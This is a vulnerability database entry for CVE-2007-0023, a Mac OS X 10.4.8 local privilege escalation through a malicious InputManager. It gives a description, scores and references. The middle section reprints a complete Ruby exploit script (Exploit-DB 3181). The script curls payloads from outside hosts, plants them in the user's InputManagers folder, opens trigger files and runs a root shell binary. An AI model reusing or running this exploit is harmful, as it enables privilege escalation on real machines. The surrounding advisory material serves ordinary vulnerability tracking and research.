CVE-2007-0023 : Detail

CVE-2007-0023

0.22%V4
Local
2007-01-24
00h00 +00:00
2017-07-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users to gain privileges via a malicious InputManager in Library/InputManagers in a user's home directory, which is executed when Cocoa applications attempt to notify the user.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.9 AV:L/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3181

Publication date : 2007-01-22 23h00 +00:00
Author : MoAB
EDB Verified : Yes

#!/usr/bin/ruby # Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com> # Lance M. Havok <lmh [at] info-pull.com> # All pwnage reserved. # # "Exploit" for MOAB-22-01-2007: All your crash are belong to us. # require 'fileutils' bugselected = (ARGV[0] || 0).to_i # INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz" # keeping a local backup. /str0ke INPUTMANAGER_URL = "https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3181.tar.gz" INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" + "mkdir -p ~/Library/InputManagers/;" + "cd ~/Library/InputManagers/;" + "tar -zxvf /tmp/moab_im.tar.gz" case bugselected when 0 target_url = "http://projects.info-pull.com/moab/bug-files/notification" trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &" when 1 target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf" trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf" when 2 target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz" trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg" end CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}" def escalate() puts "++ Welcome to Pwndertino..." system CMD_LINE sleep 5 system "/Users/Shared/shX" end escalate() # milw0rm.com [2007-01-23]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4.8

References

http://www.osvdb.org/32695
Tags : vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA07-047A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/24198
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1017542
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/315856
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/23846
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/0074
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/22188
Tags : vdb-entry, x_refsource_BID